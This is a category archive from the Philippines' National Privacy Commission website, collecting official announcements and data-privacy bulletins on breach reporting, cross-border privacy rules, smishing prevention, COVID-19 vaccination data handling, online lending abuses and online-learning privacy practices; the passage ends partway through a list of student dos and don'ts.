Category Archive: Uncategorized
NPC and INAI Hold Transition Meeting for GPA fee-funded Secretariat
Mexico City, Mexico - The National Privacy Commission (NPC) of the Philippines convened with Mexico’s Instituto Nacional de Transparencia, Acceso a la Información y Protección de Datos Personales (INAI) (National Institute for Transparency, Access to Information, and Personal Data Protection of Mexico) on 20-21 January 2025 for a transition meeting marking a significant milestone in global data privacy governance.
During the two-day meeting, discussions focused on NPC’s assumption of its role as the first-ever fee-funded Secretariat of the Global Privacy Assembly (GPA).
The GPA is an international forum for data protection and privacy authorities, regulatory agencies, and other stakeholders, primarily for exchanging best practices and regulatory approaches. INAI served as the incumbent Chair and Secretariat of the GPA until October 2024, when these roles passed to the authorities of Bulgaria as Chair and the Philippines as Secretariat. The transition meeting between NPC and INAI facilitated the exchange of insights and experiences between the two data protection and privacy authorities, with INAI sharing with NPC its knowledge and practices in leading and assisting the GPA.
In his opening remarks, Privacy Commissioner Atty. John Henry D. Naga acknowledged INAI’s invaluable contributions and dedicated service as GPA Secretariat. He emphasized, “We have big shoes to fill, but I am confident that through your cooperation, NPC will be able to continue the efforts to support the Assembly and its Executive Committee. We are determined to successfully and effectively fulfill the duties bestowed to us by the Assembly. To do that, we need the expertise and assistance of INAI, especially in providing vital information that the Secretariat work entails.”
INAI’s Commissioner Josefina Román Vergara highlighted the importance of ensuring a seamless transition and effective preparation for the responsibilities of the GPA Secretariat. She stated, “This meeting is an opportunity to provide insights, share best practices and equip the new secretariat with the necessary tools and knowledge to undertake the responsibilities associated with the new role as GPA secretariat. This collaboration will strengthen the shared commitment of upholding privacy and data protection standards globally.”
INAI’s Director General for International Affairs Juan Manuel Mota Perales and INAI’s Director of International Data Affairs Mariana Gómez led the transition meeting and successfully facilitated the logistical, operational, and substantive tasks related to assembly governance and information governance, including managing the Secretariat’s email, website, and social media channels.
INAI’s Commissioner President Adrián Alcalá Méndez and other officials from NPC and INAI also participated in the GPA transition meeting.
###
Announcement regarding the submission of Personal Data Breach Notifications (PDBN) and Annual Security Incident Reports (ASIR)
All Personal Data Breach Notifications (PDBN) and Annual Security Incident Reports (ASIR) shall be submitted through the Data Breach Notification Management System (DBNMS) online platform (https://dbnms.privacy.gov.ph). Submissions through email, personal filing, ordinary mail, licensed courier service, and any other mode of physical submission shall NOT be considered valid.
The deadline for the submission of ASIRs for the years 2018 to 2021 is on 31 October 2022.
For 2022 ASIRs, the DBNMS shall accept submissions from 1 January 2023 to 31 March 2023.
To guide you in navigating the DBNMS, please watch the videos below:
- How to create a DBNMS account
- How to submit a Personal Data Breach Notification report
- How to comply with the required documents and information
- How to submit an Annual Security Incident Report
For concerns relating to the system, email us at [email protected].
Compliance and Monitoring Division
NOTICE OF PUBLIC HEARING
Concerned organizations, stakeholders, and other interested parties are invited to submit their comments, suggestions, opinions, and other valuable inputs regarding the draft new registration circular to be adopted by the National Privacy Commission.
Please see the attached NPC Circular for reference.
This Circular aims to replace NPC Circular 17-01 and, together with the new NPC Registration System, shall make it easier for personal information controllers, personal information processors, and individual professionals to comply with the registration requirement of the Data Privacy Act of 2012.
Please send your comments/suggestions/opinions and other valuable inputs to [email protected] not later than 31 July 2022.
The Commission will conduct an online public hearing on 8 August 2022 from 1:30-3:30 PM. Interested participants who wish to join may send an email to the address provided above on or before 31 July 2022.
Thank you.
Global Cross-Border Privacy Rules (CBPR) Declaration
Canada, Japan, the Republic of Korea, the Philippines, Singapore, Chinese Taipei, and the United States of America, as current economies participating in the APEC CBPR System,
Recognising that growing Internet connectivity and the digitisation of the global economy have resulted in the rapid increase in the collection, use, and transfer of data across borders, a trend that continues to accelerate;
Conscious that trusted cross-border data flows are indispensable—not just for big, multinational technology companies, but for companies across all sectors of the economy, and for micro, small- and medium-sized businesses, workers, and consumers as well;
Believing that cross-border data flows increase living standards, create jobs, connect people in meaningful ways, facilitate vital research and development in support of public health, foster innovation and entrepreneurship, and allow for greater international engagement;
Acknowledging that regulatory barriers threaten to undermine opportunities created by the digital economy at a time when companies are relying increasingly on digital technologies and innovations to continue business operations and recover economically;
Recognising the importance of strong and effective data protection and privacy in strengthening consumer and business trust in digital transactions;
Acknowledging the important contribution made by the Asia-Pacific Economic Cooperation (APEC) in developing the APEC CBPR System to foster cross-border data flows and interoperability;
Do hereby declare as follows:
- The establishment of a Global CBPR Forum to promote interoperability and help bridge different regulatory approaches to data protection and privacy;
- The objectives of the Global CBPR Forum are to:
- establish an international certification system based on the APEC Cross Border Privacy Rules (CBPR) and Privacy Recognition for Processors (PRP) Systems;
- support the free flow of data and effective data protection and privacy through promotion of the Global CBPR and PRP Systems;
- provide a forum for information exchange and cooperation on matters related to the Global CBPR and PRP Systems;
- periodically review data protection and privacy standards of members to ensure Global CBPR and PRP program requirements align with best practices; and
- promote interoperability with other data protection and privacy frameworks.
SCOPE OF ACTIVITY
- The Global CBPR Forum is expected to:
- promote expansion and uptake of the Global CBPR and PRP Systems globally to facilitate data protection and free flow of data;
- disseminate best practices for data protection and privacy and interoperability; and
- pursue interoperability with other data protection and privacy frameworks.
MODE OF OPERATION
- Cooperation is intended to be based on:
- the principle of mutual benefit and a commitment to open dialogue and consensus-building, with equal respect for the views of all members;
- consultation and exchange of views among representatives of members, drawing upon research, analysis and policy ideas contributed by members and other relevant organisations; and
- active multistakeholder participation in appropriate activities.
PARTICIPATION
- Participation in the Global CBPR Forum is intended to be open, in principle, to those jurisdictions which accept the objectives and principles of the Global CBPR Forum as embodied in this Declaration.
- Decisions regarding future participation in the Global CBPR Forum should be made on the basis of a consensus of all members.
- Non-members may be invited to the meetings of the Global CBPR Forum upon such terms and conditions as may be determined by all members.
ORGANISATION
- Meetings of Global CBPR Forum members should be held at least biannually to determine the direction and nature of activities within the framework of this Declaration and decide on arrangements for implementation. Meetings can be held in person or remotely.
- Additional meetings may be convened as decided by all members.
FAQs
How is the Global CBPR Forum related to the Asia-Pacific Economic Cooperation (APEC) CBPR and Privacy Recognition for Processors (PRP) Systems?
The Global CBPR Forum intends to establish an international certification system based on the APEC CBPR and PRP Systems, but the system will be independently administered and separate from the APEC Systems. The founding members of the Global CBPR Forum will consult with Accountability Agents and certified companies in the APEC Systems to formally transition operations from APEC to the Global CBPR Forum and will provide at least 30 days’ notice to Accountability Agents.
What if my business is currently certified or is interested in becoming certified in the APEC CBPR or the PRP Systems?
APEC CBPR and PRP certifications will continue to be provided through APEC-approved Accountability Agents until further notice. The founding members of the Global CBPR Forum that are currently participants in the APEC CBPR System plan to transition operations of the CBPR and PRP Systems from APEC to the Global CBPR Forum and will provide at least 30 days’ notice to Accountability Agents. All approved Accountability Agents and certified companies will automatically be recognized in the new Global CBPR Forum based on the same terms that they are recognized within the APEC CBPR and PRP Systems. Please contact your Accountability Agent for more information on the transition to the Global CBPR Forum.
How can I participate in the Global CBPR Forum?
The Global CBPR Forum members welcome consultations with jurisdictions that accept the objectives and principles of the Global CBPR Forum to identify alignment with CBPR System requirements.
NPC PHE Bulletin No. 21 Preventive Data Privacy Practices Against Smishing
The National Privacy Commission (NPC) has received reports of smishing where mobile users received unsolicited SMS messages allegedly due to the contact information they provided in COVID-19 contact tracing and health declaration forms.
The contents of these unsolicited messages reportedly include links that redirect to legitimate looking but fraudulent sites when clicked. These sites may steal users’ personal data, introduce mobile malware, and even commit fraud.
Smishing is a type of phishing attack that targets victims through mobile text messaging or SMS. Smishing attacks occur when threat actors send text messages to trick subscribers into clicking malicious websites.
One smishing scenario involves the activation of a dummy Facebook account. The text message sent to a user contains a code and a shortened link that, when clicked, binds the recipient’s mobile number to the dummy account.
Smishing can also be used in online shopping/delivery to trick unsuspecting victims who expect a product they purchased online. Clicking the shortened link will redirect the recipient to a website that prompts them to fill out their personal and banking information to complete the delivery.
The Commission highlights the importance of being vigilant and aware of cybersecurity attacks. “One of the best ways users can arm themselves against smishing attacks is to be aware of this kind of manipulation. Scrutinize the text messages you receive, especially if they come from an unknown number and request information about you. Be skeptical and don’t assume that every message you receive is genuine,” Privacy Commissioner Raymund E. Liboro said.
A recent data privacy and security advisory from the Commission’s Data Security and Technology Standards Division recommends steps users can take to protect themselves against smishing. This bulletin also reminds organizations to safeguard the personal data they process.
Good practice
a. For data subjects
- Do not click links of services you did not sign up for. Be cautious with shortened links. A URL shortening service is an online tool that allows users to create a short and unique website link. These URL shortening services may be used by threat actors to conceal their malicious links.
- Malicious links require an action from you, such as filling out online forms with your personal or financial information.
- Do not open links inside in-app browsers. Set your mobile phone’s default browser as the application that opens links.
- Android OS and iOS smartphone users are advised to immediately block and report the unsolicited text messages they receive using the built-in spam feature in their SMS apps.
- Spam or junk messages generally refer to unsolicited messages in email, instant messaging, or SMS. Messages recognized by your mobile operating system or SMS app as “spam” or “junk” go to a separate folder.
- Disable “link previews” in the SMS app.
i. Block, filter, and report messages on iPhone (iOS: iMessage)
The Messages app blocks unwanted messages, filters messages from unknown senders, and reports spam or junk messages.
Block messages from a specific phone or number
1. In a conversation on Messages, tap the name or number at the top, then tap at the top right portion.
2. Tap info.
3. Scroll down, then tap Block this Caller.
To view and manage your list of blocked contacts and phone numbers, go to Settings > Messages > Blocked Contacts.
Filter messages from unknown senders
Filtering messages from unknown senders turns off iMessage notifications from senders not in your contact list and moves the messages to the Unknown Senders tab in the Messages app.
1. Go to Settings > Messages.
2. Turn on Filter Unknown Senders.
Note: You cannot open any link in a message from an unknown sender until you add the sender to your contacts or reply to the message.
Report spam or junk messages
With iMessage, a message you receive from someone not in your contact list may be identified as possible spam or junk. You can report this type of message to Apple.
In the message, tap Report Junk, then tap Delete and Report Junk.
The sender’s information and the message are sent to Apple, and the message is permanently deleted from your device.
Note: Reporting the message as junk or spam does not prevent the sender from sending other messages, but you can block the number to stop receiving messages from the sender.
To report spam or junk messages you receive with SMS or MMS, contact your carrier.
ii. Report Spam and Blocking (Android OS: Google Messages)
When you report a chat as spam, you can block the sender and move it to your “Spam & blocked” folder.
1. On your Android phone or tablet, open the Messages app.
2. Touch and hold the chat you want to report.
3. Tap Block > Report spam > OK.
You can also open the chat to report it as spam. From the chat, tap More > Details > Block & report spam > Report spam > OK.
Note: The contact will be reported as spam, and the chat will be moved to your “Spam & blocked” folder. You can report spam without blocking the contact.
Report spam in a group message
When you report spam in a group message, the spammer is reported, and the message is moved to your “Spam & blocked” folder.
1. On your Android phone or tablet, open the Messages app.
2. Open the chat you want to report.
3. Tap More > Group details > Report spam.
4. Tap Report spam.
Remove a spam report
You can remove spam reports after submitting them.
1. On your Android phone or tablet, open the Messages app.
2. Tap More > Spam & blocked.
3. Select a chat.
4. Tap Not spam. If you want to unblock a contact or number which you blocked, tap Unblock. If you tap Unblock, the chat will be removed from the "Spam & blocked" folder.
b. For personal information controllers and personal information processors
Efforts to control the spread of COVID-19 prompted an increase in the collection of personal data through contact tracing and/or health declaration forms in establishments and workplaces.
Consequently, these establishments must ensure the protection of the personal data that they are collecting.
Recommended measures are as follows:
- Apply access controls to the database of data collected physically and electronically.
- Implement appropriate security measures in the contact tracing applications (both web and mobile).
- Process personal information, especially mobile numbers contained in the contact tracing and health declaration forms, only to alleviate the risk of COVID-19 infection and not for any other purpose.
- Ensure that health declaration forms or log sheets are not in a matrix form where visitors can see one another’s personal information. For further guidance, refer to
***
NPC PHE Bulletin No. 20 Processing of vaccination cards for promos, raffles, or discounts
The National Privacy Commission (NPC) received concerns about the collection of copies of COVID-19 vaccination cards by certain delivery companies, which are also personal information controllers (PICs), wishing to reward vaccinated individuals by offering them promos, raffles, or discounts.
We laud these gestures as part of the ongoing initiative to encourage all eligible individuals to be vaccinated against COVID-19. But we remind all PICs engaged in the personal data processing activity of the following:
- Vaccination cards contain sensitive personal information such as the vaccinee’s age, date of birth, and health information.
- In processing sensitive personal information, consent may be a lawful basis. For consent to be valid, it must be freely given, specific, informed, and an indication of will. This means that the vaccinee should explicitly agree to the collection and processing of his or her vaccine card. Consent must also be evidenced by written, electronic or recorded means.
- A privacy notice must be provided to sufficiently inform the vaccinees wishing to avail themselves of the promos, raffles, or discounts on the details of the processing of their personal data and their rights as data subjects, among other necessary information, for PICs to demonstrate transparency.
- The use of the vaccine card must also be limited to the purpose for which it was collected, i.e., availing oneself of the promos, raffles, or discounts. It shall not be used for further processing, such as profiling, automated decision making, or for other purposes incompatible with the declared and specified purpose.
- The health information of the data subjects must be adequately secured. PICs must adopt measures to protect copies of the vaccine cards and shall be accountable for their processing.
- The vaccine cards should never be posted by PICs on public platforms. Such unauthorized disclosure may be punishable under the Data Privacy Act of 2012 and other applicable laws.
- Copies of the vaccine cards must be retained only for as long as necessary for the fulfillment of the purpose. These must be disposed of in a secure manner – hard copies must be shredded properly, while soft copies must be deleted or overwritten in a manner that ensures the stored copies of the vaccine cards are permanently and irreversibly destroyed and beyond recovery.
We also remind all data subjects to report any data privacy concern to the NPC. We may be reached at [email protected].
***
Joint press statement of the National Privacy Commission, Fintech Alliance.PH, Philippine Finance Association, and the non-bank financing sector against illegal practices of online lending apps
The National Privacy Commission (NPC) is ardent in promoting the ethical and responsible treatment of the citizens’ personal data. We, along with the Philippine Finance Association members, the Fintech Alliance.ph members, and the non-bank financing institutions, strongly condemn the practice of some online lending platforms of harvesting excessive information without legitimate purpose through the use of unreasonable and unnecessary app permissions, including saving and storing their clients’ contact list and photo gallery ostensibly to evaluate their creditworthiness. Such practice is unnecessary because an applicant’s creditworthiness may be determined through other lawful and reasonable means.
We likewise reiterate our appeal to non-compliant operators of online lending apps to refrain from exploiting borrowers by using the borrowers’ personal data to shame and coerce them into paying their loans through unauthorized and unfair use of their personal data. Now more than ever, business operators must act with consideration and a strong moral code as the whole world struggles with the exhaustive toll of the COVID-19 pandemic. We remind concerned digital lending players to strictly adhere to the Code of Conduct and Code of Ethics as well as the Code of Collection Standards and Ethics that the FinTech Alliance.ph and the Philippine Finance Association have established and standardized in the industry to ensure strict compliance while promoting consumer protection.
Entities are obligated to comply with the Data Privacy Act of 2012 and related laws when processing the personal data of data subjects. Reference may also be made to NPC Circular 20-01 which provides guidelines for processing personal data for loan-related transactions.
We call on these non-compliant lending entities to use lawful and reasonable methods in evaluating loan applicants' creditworthiness as well as in debt collection practices by upholding data subject rights without resorting to unfair debt collection practices and harassment of borrowers such as the use of insults or profane language, violent threats or false representation and unnecessarily exposing their borrowers’ personal data to unauthorized persons.
Lending companies must bear in mind that they are always accountable for the personal data under their control or custody. Thus, they are obliged to adopt and implement reasonable policies in handling the personal data of borrowers.
***
PROPOSED SUSPENSION OF THE PROVISIONS OF THE DATA PRIVACY ACT OF 2012 FOR CONTACT TRACING
NPC PHE Bulletin No. 19: Personal data processing for the COVID-19 vaccination program
The National Privacy Commission (NPC) received various reports on harmful data collection practices apparently carried out for the vaccination program of the government.
For instance, senior citizens were required by a personnel of a local government unit (LGU) to submit their personal data through the comments section of a social media platform if they wish to receive the vaccine. Such comments are publicly accessible and therefore susceptible to further processing and use for unauthorized purposes.
On the other hand, some companies expressed uncertainty as to the requirement to submit personal data of their employees who are willing to be vaccinated and/or may be qualified to avail of the vaccine, on the mistaken belief that this will already be automatically construed as a violation of the Data Privacy Act of 2012 (DPA).
We understand that the above efforts to collect personal data may be related with the masterlisting requirements under the following:
- Philippine National Deployment and Vaccination Plan for COVID-19 Vaccines (Plan);
- Department of Health (DOH) Department Memorandum (DM) No. 2021 – 0099 or the Interim Omnibus Guidelines for the Implementation of the National Vaccine Deployment Plan for COVID-19;
- Republic Act No. 11525 or the COVID-19 Vaccination Program Act of 2021; and
- Implementing Rules and Regulations (IRR) of RA No. 11525 issued by the DOH and the National Task Force Against COVID-19 through Joint Administrative Order (JAO) No. 2021-0001.
We remind all personal information controllers (PICs), whether in the government or the private sector, that there is a proper manner to accomplish this masterlisting activity without unnecessarily compromising personal data and infringing on the data privacy rights of individuals wanting to be vaccinated against COVID-19.
While the NPC does not intend to offer any opinion involving medical or clinical decision-making in relation to the vaccine roll-out, we issue this Bulletin to provide additional guidance on the vaccination-related personal data processing and a reiteration of our stance that the DPA does not operate to hinder the pandemic response:
1. We emphasize that there are existing laws and regulations which provide for the operational guidelines in the implementation of the nationwide vaccine deployment vaccination program. There are prescribed processes for masterlisting intended vaccinees which should be strictly followed. Government agencies and the private sector should not deviate from these standard processes.
2. The proper preparation and submission of masterlists, using the prescribed methods and formats in accordance with the Plan and laws and related DOH issuances, by required institutions such as health facilities and the LGUs, are allowed under the DPA. The DPA should not be used as an excuse for failing to comply with the masterlisting requirements.
3. Health facilities and LGUs are mandated to securely gather the necessary personal data as determined by the DOH and any other proper government authorities and submit the same through the COVID-19 Vaccine Information Management System – Immunization Registry (VIMS-IR), the official platform for master listing and preregistration of individuals for COVID-19 vaccination. As mentioned in the Plan and the DOH DM, external systems may be used to submit the necessary information following the prescribed minimum required data fields for vaccine registration systems.
4. LGUs and other PICs involved should endeavor to prepare a privacy notice which explains in clear and plain language to the data subjects the details of the vaccination-related personal data processing activities. Essentially, these privacy notices must be able to explain the purpose for collecting personal data, the legal basis for processing, that the personal data shall be stored in the VIMS-IR platform, their rights under the DPA, contact information of the pertinent data protection officers, among others.
5. We understand that consent will be obtained not only for the vaccination but also for personal data collection as well. Consent of the data subjects refers to any freely given, specific, informed indication of will, whereby the data subject agrees to the processing of his/her personal data and this should be evidenced by written, electronic or recorded means. Consent must be obtained prior to any processing of personal data. A data subject may also specifically authorize another person to give consent on his or her behalf. The requirement of evidence of such consent also applies in this situation.
6. The declared purpose of the processing of personal data is to establish a masterlist of eligible population for vaccination to enable health authorities to decide on who can be safely vaccinated from a clinical perspective. Personal data collected for this purpose must not be further processed for other purposes which are incompatible with the specified and declared purpose.
7. We understand that after immunization, the LGUs as well as the private sector are likewise required to submit the masterlist of persons who have already been inoculated through the VIMS-IR, subject to further guidance as may be issued by the DOH and the Department of Information and Communications Technology (DICT). This is likewise recognized under the DPA and should be complied with.
8. On the issuance of the COVID-19 Vaccine Cards, we understand that a standard form shall be used containing the necessary information prescribed by the DOH. While the vaccine cards shall remain accessible through printed cards issued by the health facilities or LGUs in line with the printing standards set by the DOH, the intention is to have digital vaccine cards for which systems and applications will be developed by the DOH, through the DICT. With this, privacy by design should be considered in the development of these digital systems.
9. We remind all PICs involved in the issuance of these vaccine cards, whether in paper or digital format, that these should never be posted in public platforms.
10. Finally, reasonable, and appropriate safeguards (physical, organizational, and technical security measures) must be implemented by the LGUs and other PICs involved to ensure the protection of personal data against any unlawful processing, alteration, disclosure, or destruction. We remind all PICs that the minimum required data for masterlisting is a comprehensive record of a potential vaccinee containing sensitive personal information. The same should be treated with utmost confidentiality and should not be posted in public platforms.
a. Only disclose patient data to proper authorities and in appropriate areas. Refrain from discussing patient data in public areas where unauthorized parties may pick up personal data, except when providing treatment under compelling circumstances. In addition, when discussing over the phone, confirm the identity of the person first and check whether he or she is authorized to receive such information.
b. Protect the computer display from unauthorized or accidental viewing. Prevent accidental viewing and disclosure of data by using privacy screens. If a privacy screen is not readily available or practical, place computer monitors inside secluded cubicles or angle them in such a way as to minimize the chance of unauthorized or accidental viewing. Computers must be locked with a password whenever the authorized user leaves the workstation.
c. Lock storage media away when not in use. If the use of portable storage media (such as USB flash drives or external hard drives) to store patient data is unavoidable, ensure that the files are encrypted and password-protected. Also, make sure they are kept secure when working in public places and not left absentmindedly on desks, counters, in conference rooms, or in other common areas where they may be accessed by unauthorized individuals.
d. Ensure that patient data are encrypted, both in transit and at rest. Electronic copies of patient data must be protected to the same extent that physical files and storage media containing patient data are secured. Encrypting patient data both in transit and at rest ensures that the files remain locked and accessible only to authorized persons.
e. Communicate securely. The security features of systems and networks must ensure that data can be transmitted both internally and externally without malicious or unauthorized users intercepting or tampering with the transmission and reception of data. Applying encryption and related measures protects transmissions from interception and exploitation of sessions, thereby increasing the security and stability of communications. Also, choose a secure platform for team collaboration and patient communication. For further protection, ensure that documents are encrypted with a password of sufficient strength, and send the password through a separate channel such as SMS/text. Apart from setting a strong password, it is likewise advised to use a second authentication factor whenever logging into accounts.
f. Conduct independent security audits and tests. After the development of data processing systems (e.g., websites, databases, and e-health systems), they must be subjected to independent security and privacy tests including, but not limited to, Source Code Audits, Vulnerability Assessment and Penetration Testing (VAPT), and Privacy Impact Assessment (PIA). This is to validate your system implementation and find out whether your data processing systems are vulnerable to common and newly emerging threats and vulnerabilities.
g. Strengthen your systems against prominent web attacks. A well-structured system, including both the front-end and back-end, ensures the protection of your data against common web attacks. The vulnerabilities found in the conduct of audits and tests must be fixed first before the system is used further. Also, it is important to secure the communication between a user’s web browser and your site. This will add another layer of protection to your system.
h. Update your systems and their components. Yesterday's security and privacy vulnerabilities may not be the same as today's. Make a conscious effort to continuously improve or update your systems and implement best practices in configuring or hardening them (e.g., database encryption at rest, encryption in transit, network access controls, data access controls, and audit logs). A web application firewall can be installed to deter Distributed Denial of Service (DDoS) attacks.
i. Back up your data. When conducting regular maintenance like a system update, upgrade, or configuration change, run a full backup of your website, and back up periodically in any case. Backups must follow your system documentation consistently and be cleared by an accountable officer in your organization such as the Data Protection Officer (DPO). Online backups are also a convenient way to ensure an accessible copy of your website when the need arises. You may use the “3-2-1” strategy:
- i. 3 total copies of the data
- ii. 2 copies are local but on different media
- iii. 1 copy is offsite, which may be geographically separated or in an online cloud computing platform
In the event of a ransomware attack, do not give in to the perpetrator's ransom demands. Backups are the only guaranteed way to restore the data.
j. Consider migrating to the cloud. Use of cloud computing services reduces capital expenses such as housing and maintaining your own data centers with servers, storage, and other active ICT components. In addition, it removes the tedious task of maintaining the security of the underlying infrastructure; your cloud service provider does that for you. However, keep in mind that proper security and routine maintenance of the web application that runs in the cloud remain your full responsibility.
k. Data privacy as a priority. While we have competing priorities at this point in time, compliance with the Data Privacy Act of 2012 must also be a priority to protect patient records. Data privacy must be integrated into the whole data lifecycle from start to finish, so that all data are securely created, retained, and securely destroyed at the end of the process. To protect the data lifecycle end to end, the processes for the creation, archiving, transport, and deletion of data need to be improved and managed effectively. A Privacy Impact Assessment can be conducted to identify data privacy risks, together with a control framework to address the gaps found in the data lifecycle.
l. Security incident management. LGU Health Departments, hospitals, clinics, and health care institutions, as Personal Information Controllers, must immediately notify the NPC and the affected data subjects in case of a potential or actual personal data breach. The organization’s Data Protection Officer and/or Data Breach Response Team should be alerted immediately so they can swiftly respond to security incidents and prevent further disclosure of patient data.
###
NPC PHE Bulletin No. 18: Online Raffles and Other Games of Chance: Ensuring Proper Safeguards in the Collection of Personal Data
As the country struggles with the pandemic and the limitations forced by the community quarantine, some enterprising businesses and organizations have offered to help individuals and families in need. From recent reports, this comes in the form of online raffles and other games of chance, where cash and/or livelihood assistance can be won instantly.
The National Privacy Commission (NPC) understands these efforts to help out. However, requiring participants to post their personal data online (e.g., names, selfies, addresses, contact numbers) in the comments section of various social media platforms, may lead to DANGERS SUCH AS STALKING, SCAMMING, ONLINE HARASSMENT, and many more.
With this, all businesses, organizations, and individuals who would like to collect personal information for purposes of raffles and giveaways are strongly urged to keep in mind the following practices:
- Be more cautious in creating contest mechanics and consider less privacy-intrusive means of collecting personal data.
- Instead of requiring the public posting of personal data, the mechanics may simply ask participants to like a post, comment an emoji, send a direct message, or other ways that will not necessitate public access to personal data.
- Data subjects may not be fully aware of, or concerned about, the possible consequences of posting personal data in public platforms.
To participants of online raffles and other games of chance, always think twice before sharing your personal data. If the contest mechanics ask for excessive information about you, or oblige you to share information where others can effortlessly obtain it, take that into consideration before joining.
The appeal of participating in such contests is undeniable but choose the ones that will not put your personal data on the line.
eRehistro: Account Creation and DPS Registration
For EASY and CONVENIENT registration on the platform, here are some things you should prepare for registering on eRehistro!
Who needs to register on eRehistro?
Both newly registering and previously registered organizations and individuals that process personal data, which we call Personal Information Controllers (PICs) and Personal Information Processors (PIPs), must register using eRehistro. Under Section 5 of NPC Circular 17-01 (https://www.privacy.gov.ph/npc-circular-17-01.../), examples include:
- Government Sector
- Financial Sector
- Telecommunication Sector
- BPO Sector
- Education Sector
- Health Sector
- Insurance Sector
- Retail and Manufacturing Sector
- Pharmaceutical Industry
- Maritime and Land-Based manning agencies
- Social media companies
- Tech Sector
- Transportation and logistics companies
- Tourism Sector
- Non-governmental Organizations
- Cooperatives
What personal data are collected when creating an account on eRehistro?
In keeping with the Data Privacy Act's principles of Proportionality and Transparency, you only need to encode the following personal data in the eRehistro Application Form:
- Name of the Head of the Organization
- Email address of the Organization
- Contact number of the Organization
- Name of the Data Protection Officer (DPO)
- Email address of the DPO
- Contact number of the DPO
- Upload of signature
- Sex of the DPO
- Name of the individual PIC
- Email address of the individual PIC
- Contact number of the individual PIC
- Government-issued ID numbers of the individual PIC
After encoding all the required data, the eRehistro Application Form must be printed, signed, and notarized.
What documents need to be prepared for creating an account on eRehistro?
When creating an account and registering on eRehistro, these are the documents that must be uploaded to the platform:
- Board Resolution or Secretary’s Certificate appointing your DPO
- Securities and Exchange Commission (SEC) or Department of Trade and Industry (DTI) registration, or any similar document proving the existence of the organization
- Notarized eRehistro Application Form
What information will be asked for when completing the registration of a Data Processing System (DPS)?
To prepare for registering your DPS, here is the information that needs to be encoded in eRehistro:
- Name of the Data Processing System
- Type of DPS (whether paper-based/manual, electronic/automated, or both)
- Purpose of the DPS
- Whether you are a PIC or a PIP
- Whether the DPS involves fully automated decision-making
- Whether the DPS is outsourced or subcontracted
- Categories of data subjects and categories of data
- Number of staff in the PIC/PIP’s data protection office
- Number of recipients to whom personal data are or may be disclosed
- Whether data are transferred to another entity outside the Philippines
What happens if a PIC or PIP does not register its DPS?
Since this is the last step of registration, a PIC or PIP will not receive a Certificate of Registration from the NPC if it does not register all of its DPS.
If an organization’s registered DPS are incomplete, this will be one of the considerations the NPC looks at when conducting compliance checks and when security breaches occur. The NPC may also investigate this in the future.
So complete the details of your DPS now to make encoding them in eRehistro easier!
NPC Statement on Reported Selling of Cashalo Users’ Personal Data
It has come to the National Privacy Commission’s attention that client data from Cashalo is reportedly being sold on the dark web.
Rest assured that the Commission has already started investigating this matter. However, to avoid jeopardizing the investigation process, we will refrain from giving further details as of the moment.
We endeavor to determine the veracity of this privacy matter and timely apprise the public as more details come in.
Atty. Michael R. Santos
OIC-Chief
Complaints and Investigation Division
NPC PHE BULLETIN No. 17: Update on the Data Privacy Best Practices in Online Learning
As schools remain constrained to conduct blended learning in lieu of face-to-face classes due to the risks of the COVID-19 pandemic, various inquiries were received from stakeholders on the conduct of synchronous online classes and other related matters.
The National Privacy Commission, in its continuing efforts to provide responsive advice and guidance, underscores the need to balance effective teaching and learning online while upholding data privacy rights.
The Commission recognizes that online, blended, and synchronous learning mechanisms aim to simulate what would have happened in an actual physical classroom before the pandemic, in order to restore some sense of normalcy in education. However, we must be reminded that the context differs considerably, as learners are at home, and that this structure cannot be fully compared to what happens in an actual physical classroom.
With this, the Commission had dialogues with regulators such as the Department of Education and Department of the Interior and Local Government, to gather inputs on the actual experiences of learners, educators, schools, and parents since the school year started, to help assess and adequately address the concerns raised in order that learning can be better facilitated.
Taking into account that the conduct of synchronous online classes is considered the best substitute for face-to-face classes based on existing research and studies on the matter, below are some of the recommended practices which may be implemented:
- Schools should create policies or guidelines on the use of cameras for the conduct of online classes and examinations, as may be reasonable and necessary to supervise and monitor learners and help educators in teaching. Opening of cameras during synchronous learning is not prohibited. Policies or guidelines should also be considered on the following:
  - Encourage the use of virtual backgrounds whenever possible to avoid displaying private living spaces.
  - Consider equality and fairness in situations where learners experience technical difficulties, limited internet connection, device malfunctions, glitches on the online platforms and other analogous circumstances, and determine alternative ways to monitor online classes and examinations in these situations.
- Schools should likewise improve existing student codes of conduct, handbooks, or similar internal policies or rules to adequately regulate student behavior during online classes. Schools must remind learners that the screen capturing, sharing, posting in social media, or any other similar kind of processing of chats, images, videos, and sounds involving their classmates and teachers during online classes may be subject to data privacy and other related regulations.
- Schools should strictly enforce their social media policy. Educators and other school personnel who may have collected personal data in their official capacity and/or during an official school activity must be reminded that the same cannot be used for personal purposes, i.e., posting in their personal social media accounts.
- Online classes may be recorded for purposes of viewing by learners who may have missed a particular class, subject to existing school policies on attendance. The same recording may likewise be used by the school and educators for training purposes. It is best that learners and/or parents and guardians are informed beforehand of this processing activity.
- Submissions of assignments and other school requirements may be done through available online messaging applications on a case-to-case basis, considering the circumstances of the learner and/or educator. But this should be done in a manner where the submissions are sent directly to the appropriate teacher or school personnel and not to be made publicly available.
- Educators and school personnel are reminded that communications involving personal data such as exam grades, results of assignments, report cards, reminders on unpaid school fees, etc. should be sent directly to the concerned recipient/s only and should never be posted in a manner that can be accessed or seen publicly.
- All policies, guidelines, or codes, where the same would involve the processing of personal data, should always adhere to the general data privacy principles of transparency, legitimate purpose, and proportionality. The best interests of the learner shall be of paramount consideration.
The above recommendations should be read together with the requirements of existing child protection policies and anti-bullying policies, as necessary and appropriate.
***
NPC PHE BULLETIN No. 16: Privacy Dos and Don’ts for Online Learning in Public K-12 Classes
As public K-12 classes nationwide are set to open in October, students, parents, guardians, teachers and schools would do well to heed guidelines on online learning that list dos and don’ts aimed at safeguarding sensitive personal information of pupils.
Issued by the Data Privacy Council for the education sector and the National Privacy Commission (NPC), the guidelines cover areas, such as online decorum, learning management systems, online productivity platforms, social media, storage of personal data, webcams and recording videos of discussions, and proctoring.
Listed are the dos and don’ts for online learning in K-12 classes:
For students
DOs
- Creating strong passwords when signing up on e-learning platforms. Passwords should be at least 12 characters, containing upper- and lower-case letters, numbers, and, if possible, symbols.
- Staying alert during online classes, especially when sharing videos, photos, and files.
- Using customized backgrounds to avoid accidental disclosure of personal information.
- Installing and regularly updating an anti-virus program.
- Muting the microphone and turning off the camera by default, especially when not speaking or reciting.
- Turning off the microphone and camera when leaving one’s station for, say, bathroom breaks.
DON'Ts
- Connecting phones, laptops, and other gadgets to free or public Wi-Fi networks. (In unavoidable circumstances, ensure that the public network has a password and is not accessible to everyone.)
